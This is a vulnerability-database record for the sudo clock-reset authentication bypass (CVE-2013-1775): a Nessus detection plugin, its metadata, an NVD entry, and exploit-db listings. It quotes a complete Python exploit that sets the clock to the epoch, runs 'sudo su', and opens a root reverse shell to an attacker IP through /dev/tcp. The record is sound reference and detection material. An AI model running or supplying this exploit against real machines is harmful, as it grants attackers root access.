FreeBSD : sudo -- Authentication bypass when clock is reset (764344fb-8214-11e2-9273-902b343deec9)
2013-03-04T00:00:00
ID FREEBSD_PKG_764344FB821411E29273902B343DEEC9.NASL Type nessus Reporter This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2013-03-04T00:00:00
Description
Todd Miller reports :
The flaw may allow someone with physical access to a machine that is
not password-protected to run sudo commands without knowing the logged
in user's password. On systems where sudo is the principal way of
running commands as root, such as on Ubuntu and Mac OS X, there is a
greater chance that the logged in user has run sudo before and thus
that an attack would succeed.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
# copyright notice, this list of conditions and the following
# disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(64987);
script_version("1.9");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id("CVE-2013-1775");
script_name(english:"FreeBSD : sudo -- Authentication bypass when clock is reset (764344fb-8214-11e2-9273-902b343deec9)");
script_summary(english:"Checks for updated package in pkg_info output");
script_set_attribute(
attribute:"synopsis",
value:"The remote FreeBSD host is missing a security-related update."
);
script_set_attribute(
attribute:"description",
value:
"Todd Miller reports :
The flaw may allow someone with physical access to a machine that is
not password-protected to run sudo commands without knowing the logged
in user's password. On systems where sudo is the principal way of
running commands as root, such as on Ubuntu and Mac OS X, there is a
greater chance that the logged in user has run sudo before and thus
that an attack would succeed."
);
# http://www.sudo.ws/sudo/alerts/epoch_ticket.html
script_set_attribute(
attribute:"see_also",
value:"https://www.sudo.ws/sudo/alerts/epoch_ticket.html"
);
# https://vuxml.freebsd.org/freebsd/764344fb-8214-11e2-9273-902b343deec9.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?6dd8ec6d"
);
script_set_attribute(attribute:"solution", value:"Update the affected package.");
script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Mac OS X Sudo Password Bypass');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:sudo");
script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
script_set_attribute(attribute:"vuln_publication_date", value:"2013/02/27");
script_set_attribute(attribute:"patch_publication_date", value:"2013/03/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/03/04");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"FreeBSD Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
exit(0);
}
include("audit.inc");
include("freebsd_package.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (pkg_test(save_report:TRUE, pkg:"sudo<1.8.6.p7")) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());
else security_warning(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "FREEBSD_PKG_764344FB821411E29273902B343DEEC9.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : sudo -- Authentication bypass when clock is reset (764344fb-8214-11e2-9273-902b343deec9)", "description": "Todd Miller reports :\n\nThe flaw may allow someone with physical access to a machine that is\nnot password-protected to run sudo commands without knowing the logged\nin user's password. On systems where sudo is the principal way of\nrunning commands as root, such as on Ubuntu and Mac OS X, there is a\ngreater chance that the logged in user has run sudo before and thus\nthat an attack would succeed.", "published": "2013-03-04T00:00:00", "modified": "2013-03-04T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/64987", "reporter": "This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.sudo.ws/sudo/alerts/epoch_ticket.html", "http://www.nessus.org/u?6dd8ec6d"], "cvelist": ["CVE-2013-1775"], "type": "nessus", "lastseen": "2021-01-07T10:45:48", "edition": 23, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1775"]}, {"type": "ubuntu", "idList": ["USN-1754-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122965", "PACKETSTORM:123032"]}, {"type": "canvas", "idList": ["SUDO_TIMESTAMP"]}, {"type": "zdt", "idList": ["1337DAY-ID-21166"]}, {"type": "exploitdb", "idList": ["EDB-ID:27944", "EDB-ID:27965"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/LOCAL/SUDO_PASSWORD_BYPASS/", "MSF:EXPLOIT/OSX/LOCAL/SUDO_PASSWORD_BYPASS"]}, {"type": "threatpost", "idList": ["THREATPOST:F7D745AB279D28510E91229D1CA48DC0", "THREATPOST:4FCE977F9517BD5F5952F684C88CEBE0"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14630", "SECURITYVULNS:DOC:29109", "SECURITYVULNS:VULN:12913", "SECURITYVULNS:DOC:32390"]}, {"type": "thn", "idList": ["THN:7BDF45E62E28D5D2D535B9AE55F8A825"]}, {"type": "openvas", "idList": ["OPENVAS:865477", "OPENVAS:871085", "OPENVAS:1361412562310841349", "OPENVAS:841349", "OPENVAS:1361412562310123520", "OPENVAS:1361412562310865484", "OPENVAS:1361412562310871048", "OPENVAS:1361412562310865477", "OPENVAS:865484", "OPENVAS:871048"]}, {"type": "seebug", "idList": ["SSV:81531"]}, {"type": "freebsd", "idList": ["764344FB-8214-11E2-9273-902B343DEEC9"]}, {"type": "nessus", "idList": ["OPENSUSE-2013-221.NASL", "REDHAT-RHSA-2013-1353.NASL", "SL_20131121_SUDO_ON_SL6_X.NASL", "UBUNTU_USN-1754-1.NASL", "SL_20130930_SUDO_ON_SL5_X.NASL", "ORACLELINUX_ELSA-2013-1353.NASL", "FEDORA_2013-3297.NASL", "ALA_ALAS-2013-259.NASL", "FEDORA_2013-3270.NASL", "SOLARIS11_SUDO_20130611.NASL"]}, {"type": "slackware", "idList": ["SSA-2013-065-01"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2642-1:282D9"]}, {"type": "fedora", "idList": ["FEDORA:510B521DE6", "FEDORA:25778215CD"]}, {"type": "centos", "idList": ["CESA-2013:1701", "CESA-2013:1353"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1353", "ELSA-2013-1701"]}, {"type": "redhat", "idList": ["RHSA-2013:1701", "RHSA-2013:1527", "RHSA-2013:1353"]}, {"type": "amazon", "idList": ["ALAS-2013-259"]}, {"type": "gentoo", "idList": ["GLSA-201401-23"]}], "modified": "2021-01-07T10:45:48", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-07T10:45:48", "rev": 2}, "vulnersScore": 6.7}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64987);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1775\");\n\n script_name(english:\"FreeBSD : sudo -- Authentication bypass when clock is reset (764344fb-8214-11e2-9273-902b343deec9)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Todd Miller reports :\n\nThe flaw may allow someone with physical access to a machine that is\nnot password-protected to run sudo commands without knowing the logged\nin user's password. On systems where sudo is the principal way of\nrunning commands as root, such as on Ubuntu and Mac OS X, there is a\ngreater chance that the logged in user has run sudo before and thus\nthat an attack would succeed.\"\n );\n # http://www.sudo.ws/sudo/alerts/epoch_ticket.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.sudo.ws/sudo/alerts/epoch_ticket.html\"\n );\n # https://vuxml.freebsd.org/freebsd/764344fb-8214-11e2-9273-902b343deec9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6dd8ec6d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"sudo<1.8.6.p7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "64987", "cpe": ["p-cpe:/a:freebsd:freebsd:sudo", "cpe:/o:freebsd:freebsd"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:52:39", "description": "sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.", "edition": 5, "cvss3": {}, "published": "2013-03-05T21:38:00", "title": "CVE-2013-1775", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1775"], "modified": "2016-11-28T19:08:00", "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:todd_miller:sudo:1.7.9p1", "cpe:/a:todd_miller:sudo:1.6.5", "cpe:/a:todd_miller:sudo:1.7.2p6", "cpe:/a:todd_miller:sudo:1.7.2p2", "cpe:/a:todd_miller:sudo:1.7.4p2", "cpe:/a:todd_miller:sudo:1.7.2p5", "cpe:/a:todd_miller:sudo:1.7.0", "cpe:/a:todd_miller:sudo:1.7.6p2", "cpe:/a:todd_miller:sudo:1.8.6p5", "cpe:/a:todd_miller:sudo:1.7.4p5", "cpe:/a:todd_miller:sudo:1.6.9p21", "cpe:/a:todd_miller:sudo:1.8.4p4", "cpe:/a:todd_miller:sudo:1.8.6p6", "cpe:/a:todd_miller:sudo:1.6.9p23", "cpe:/a:todd_miller:sudo:1.6.7", "cpe:/a:todd_miller:sudo:1.6.9p22", "cpe:/a:todd_miller:sudo:1.7.2p7", "cpe:/a:todd_miller:sudo:1.8.6p3", "cpe:/a:todd_miller:sudo:1.8.3", "cpe:/a:todd_miller:sudo:1.8.1p2", "cpe:/a:todd_miller:sudo:1.6.6", "cpe:/a:todd_miller:sudo:1.7.8p2", "cpe:/a:todd_miller:sudo:1.7.10p4", "cpe:/a:todd_miller:sudo:1.8.1p1", "cpe:/a:todd_miller:sudo:1.7.4", "cpe:/a:todd_miller:sudo:1.7.5", "cpe:/a:todd_miller:sudo:1.8.6p4", "cpe:/a:todd_miller:sudo:1.6.4", "cpe:/a:todd_miller:sudo:1.7.4p1", "cpe:/a:todd_miller:sudo:1.7.10", "cpe:/a:todd_miller:sudo:1.7.10p2", "cpe:/a:todd_miller:sudo:1.7.1", "cpe:/a:todd_miller:sudo:1.8.3p1", "cpe:/a:todd_miller:sudo:1.6.3_p7", "cpe:/a:todd_miller:sudo:1.8.0", "cpe:/a:todd_miller:sudo:1.7.2p4", "cpe:/a:todd_miller:sudo:1.6.2p3", "cpe:/a:todd_miller:sudo:1.7.4p6", "cpe:/a:todd_miller:sudo:1.7.10p1", "cpe:/a:todd_miller:sudo:1.8.4", "cpe:/a:todd_miller:sudo:1.6.7p5", "cpe:/a:todd_miller:sudo:1.6.1", "cpe:/a:todd_miller:sudo:1.7.2", "cpe:/a:todd_miller:sudo:1.6.8", "cpe:/a:todd_miller:sudo:1.7.10p6", "cpe:/a:todd_miller:sudo:1.8.5", "cpe:/a:todd_miller:sudo:1.8.6p1", "cpe:/a:todd_miller:sudo:1.6.8p12", "cpe:/a:todd_miller:sudo:1.6.9", "cpe:/a:todd_miller:sudo:1.8.5p1", "cpe:/a:todd_miller:sudo:1.8.4p5", "cpe:/a:todd_miller:sudo:1.7.3b1", "cpe:/a:todd_miller:sudo:1.8.5p3", "cpe:/a:todd_miller:sudo:1.7.10p5", "cpe:/a:todd_miller:sudo:1.8.2", "cpe:/a:todd_miller:sudo:1.7.2p3", "cpe:/a:todd_miller:sudo:1.6.2", "cpe:/a:todd_miller:sudo:1.7.10p3", "cpe:/a:todd_miller:sudo:1.7.8", "cpe:/a:todd_miller:sudo:1.8.4p3", "cpe:/a:todd_miller:sudo:1.8.1", "cpe:/a:todd_miller:sudo:1.8.6p2", "cpe:/a:todd_miller:sudo:1.7.8p1", "cpe:/a:todd_miller:sudo:1.8.5p2", "cpe:/a:todd_miller:sudo:1.6.9p20", "cpe:/a:todd_miller:sudo:1.8.4p2", "cpe:/a:todd_miller:sudo:1.7.2p1", "cpe:/a:todd_miller:sudo:1.7.6p1", "cpe:/a:todd_miller:sudo:1.6.3", "cpe:/a:todd_miller:sudo:1.7.9", "cpe:/a:todd_miller:sudo:1.8.6", "cpe:/a:todd_miller:sudo:1.8.4p1", "cpe:/a:todd_miller:sudo:1.6.4p2", "cpe:/a:todd_miller:sudo:1.7.4p4", "cpe:/a:todd_miller:sudo:1.7.6", "cpe:/a:todd_miller:sudo:1.7.4p3", "cpe:/a:todd_miller:sudo:1.7.7", "cpe:/a:todd_miller:sudo:1.8.3p2", "cpe:/a:todd_miller:sudo:1.6"], "id": "CVE-2013-1775", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1775", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:todd_miller:sudo:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9p21:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.9p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.5p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.6p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9p23:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.2p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.8p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.1p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9p22:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.8p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.6p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.3b1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.3p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8p12:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9p20:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.4p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.7p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.3p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.5p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.5p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.1p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.4:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T07:08:42", "description": "OSX <= 10.8.4 - Local Root Privilege Escalation (py). CVE-2013-1775. Local exploit for osx platform", "published": "2013-08-30T00:00:00", "type": "exploitdb", "title": "OSX <= 10.8.4 - Local Root Privilege Escalation py", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-30T00:00:00", "id": "EDB-ID:27965", "href": "https://www.exploit-db.com/exploits/27965/", "sourceData": "#!/usr/bin/python\r\n\r\n# Original MSF Module: \r\n# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb\r\n\r\n###################################################################################################\r\n# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell\r\n# Date: 08-27-2013\r\n# Exploit Author: David Kennedy @ TrustedSec\r\n# Website: https://www.trustedsec.com\r\n# Twitter: @Dave_ReL1K\r\n# Tested On: OSX 10.8.4\r\n#\r\n# Reference: http://www.exploit-db.com/exploits/27944/\r\n#\r\n# Example below:\r\n# trustedsec:Desktop Dave$ python osx_esc.py \r\n# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444\r\n#\r\n# attacker_box:~ Dave$ nc -l 4444\r\n# bash: no job control in this shell\r\n# bash-3.2# \r\n###################################################################################################\r\nimport subprocess\r\n\r\n# IPADDR for REVERSE SHELL - change this to your attacker IP address\r\nipaddr = \"192.168.1.1\"\r\n\r\n# PORT for REVERSE SHELL - change this to your attacker port address\r\nport = \"4444\"\r\n\r\n# drop into a root shell - replace 192.168.1.1 with the reverse listener\r\nproc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)\r\nproc.stdin.write(\"systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\\nbash -i >& /dev/tcp/%s/%s 0>&1 &\\n\" % (ipaddr,port))\r\nprint \"\"\"\r\n###############################################################\r\n#\r\n# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell\r\n#\r\n# Written by: David Kennedy @ TrustedSec\r\n# Website: https://www.trustedsec.com\r\n# Twitter: @Dave_ReL1K\r\n#\r\n# Reference: http://www.exploit-db.com/exploits/27944/\r\n###############################################################\r\n\"\"\"\r\nprint \"[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s\" % (ipaddr,port)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27965/"}, {"lastseen": "2016-02-03T07:06:11", "description": "Mac OS X Sudo Password Bypass. CVE-2013-1775. Local exploit for osx platform", "published": "2013-08-29T00:00:00", "type": "exploitdb", "title": "Mac OS X Sudo Password Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-29T00:00:00", "id": "EDB-ID:27944", "href": "https://www.exploit-db.com/exploits/27944/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n#\r\n# 